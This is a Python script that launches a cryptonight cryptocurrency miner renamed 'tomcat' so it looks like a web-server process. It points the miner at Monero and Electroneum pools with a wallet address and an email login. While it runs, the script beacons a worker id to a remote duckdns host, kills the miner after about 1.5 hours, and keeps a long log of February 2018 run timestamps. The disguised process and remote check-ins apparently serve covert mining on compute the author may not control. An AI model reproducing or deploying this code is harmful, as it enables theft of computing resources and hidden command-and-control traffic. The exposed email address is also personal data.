import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:03.786472
#2018-02-17 16:38:04.929692
#2018-02-17 18:26:05.410860
#2018-02-17 20:14:05.001857
#2018-02-17 22:02:07.563941
#2018-02-17 23:46:05.155159
#2018-02-18 01:35:01.676049
#2018-02-18 03:22:05.184741
#2018-02-18 05:09:06.311735
#2018-02-18 07:01:01.991682
#2018-02-18 08:48:06.626582
#2018-02-18 10:36:07.307369
#2018-02-18 12:21:05.628033
#2018-02-18 14:08:04.162368
#2018-02-18 15:58:01.617159
#2018-02-18 17:47:05.040319
#2018-02-18 19:33:05.710083
#2018-02-18 21:18:07.572454
#2018-02-18 23:06:07.246951
#2018-02-19 00:53:04.160225
#2018-02-19 02:39:06.271997
#2018-02-19 04:26:02.146649
#2018-02-19 06:11:01.719175
#2018-02-19 07:58:04.017213
#2018-02-19 09:49:06.151338
#2018-02-19 11:37:05.976219
#2018-02-19 13:23:09.344226
#2018-02-19 15:11:06.048971
#2018-02-19 16:58:04.977919
#2018-02-19 18:44:04.287183
#2018-02-19 20:34:01.331772
#2018-02-19 22:21:02.077884
#2018-02-20 00:07:01.680682
#2018-02-20 01:53:07.271492
#2018-02-20 03:43:06.986890
#2018-02-20 05:27:07.550370
#2018-02-20 07:11:07.903633
#2018-02-20 08:57:07.335168
#2018-02-20 10:42:07.939329
#2018-02-20 12:28:05.676523
#2018-02-20 14:15:10.881045
#2018-02-20 15:58:01.460533
#2018-02-20 17:45:01.548017
#2018-02-20 19:36:08.307670
#2018-02-20 21:21:07.742922
#2018-02-20 23:05:08.861946
#2018-02-21 00:48:07.653448
#2018-02-21 02:33:01.543839
#2018-02-21 04:21:06.499328
#2018-02-21 06:12:06.123303
#2018-02-21 07:57:04.904665
#2018-02-21 09:42:08.071210
#2018-02-21 11:32:05.068449
#2018-02-21 13:23:05.609183
#2018-02-21 15:07:08.856961
#2018-02-21 16:58:01.351700
#2018-02-21 18:46:01.938139
#2018-02-21 20:33:07.839312
#2018-02-21 22:21:01.500044
#2018-02-22 00:12:01.563844
#2018-02-22 01:58:03.666667
#2018-02-22 03:45:07.629277
#2018-02-22 05:32:07.097753
#2018-02-22 07:17:06.902692
#2018-02-22 09:05:01.336464
#2018-02-22 10:52:02.213366
#2018-02-22 12:38:07.353260
#2018-02-22 14:24:09.929991
#2018-02-22 16:11:01.851310
#2018-02-22 17:56:09.348125
#2018-02-22 19:46:06.718342
#2018-02-22 21:36:05.937782
#2018-02-22 23:23:04.466013
#2018-02-23 01:11:01.495907
#2018-02-23 02:57:03.882513
#2018-02-23 04:44:07.539154
#2018-02-23 06:32:06.918676
#2018-02-23 08:21:02.212693
#2018-02-23 10:37:04.403580
#2018-02-23 12:29:09.199578
#2018-02-23 14:17:05.963398
#2018-02-23 16:07:01.796729
#2018-02-23 17:52:08.318945
#2018-02-23 19:39:05.150991
#2018-02-23 21:22:07.738920
#2018-02-23 23:10:06.318291
#2018-02-24 00:58:07.686816
#2018-02-24 02:53:02.171897
#2018-02-24 04:43:07.665194
#2018-02-24 06:28:04.201457
#2018-02-24 08:16:06.493006
#2018-02-24 10:01:06.679141
#2018-02-24 11:59:05.176243
#2018-02-24 13:47:01.266575
#2018-02-24 15:45:07.322264
#2018-02-24 17:44:05.604522
#2018-02-24 19:31:06.248126
#2018-02-24 21:19:01.653468
#2018-02-24 23:57:04.966355
#2018-02-25 03:12:06.459541
#2018-02-25 07:00:08.268832